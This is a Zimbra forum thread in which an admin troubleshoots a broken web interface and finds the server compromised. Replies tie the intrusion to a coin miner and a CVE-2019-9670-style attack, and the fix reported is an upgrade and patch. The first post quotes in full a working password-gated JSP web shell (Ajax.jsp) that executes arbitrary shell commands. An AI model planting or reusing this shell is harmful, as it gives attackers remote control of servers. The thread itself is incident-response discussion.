zimbra not listen in 443 port

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Post Reply
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

zimbra not listen in 443 port

Post by seryoga_p »

Hi, some strange things are going on my mail server

Code: Select all

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$
Today suddenly stopped working zimbra on 443 port with error

Code: Select all

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp
nginx is fine:

Code: Select all

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$
accidentally i looked for a folder /opt/zimbra/jetty/webapps/zimbra/public/

Code: Select all

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp
there is a file Ajax.jsp modified yesterday

Code: Select all

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>
am i hacked?? Is there any way to restore zimbra functionality?
phoenix
Ambassador
Ambassador
Posts: 27262
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: zimbra not listen in 443 port

Post by phoenix »

seryoga_p wrote:am i hacked?? Is there any way to restore zimbra functionality?
If you want to check then see if this applies to your server: viewtopic.php?f=15&t=65932
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working
GlooM
Advanced member
Advanced member
Posts: 127
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Post by GlooM »

seryoga_p wrote:fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working
Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

GlooM wrote: Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?
Hi, GlooM )
Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner
GlooM
Advanced member
Advanced member
Posts: 127
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Post by GlooM »

seryoga_p wrote: Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner
As I understand it, the hacking technique is the same.
zmswatch - miner, Ajax.jsp - shell?

Last patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ - There are no files zmcat; l.sh and s.sh, and less trash in /opt/zimbra/jetty/

This is probably a new hacking technique than previously described in CVE-2019-9670
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Post by seryoga_p »

Scanned with clamav:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND
It would probably be more correct to make backups of zimbra, reinstall the centos and make a fresh zimbra install then restore backup, but unfortunately, there is no storage space on the rented vps to recover mail quickly (now ~ 80GB).
I plan to stay on this vps to the end of the year and then move to physical hardware with zimbra or somesing else.
Post Reply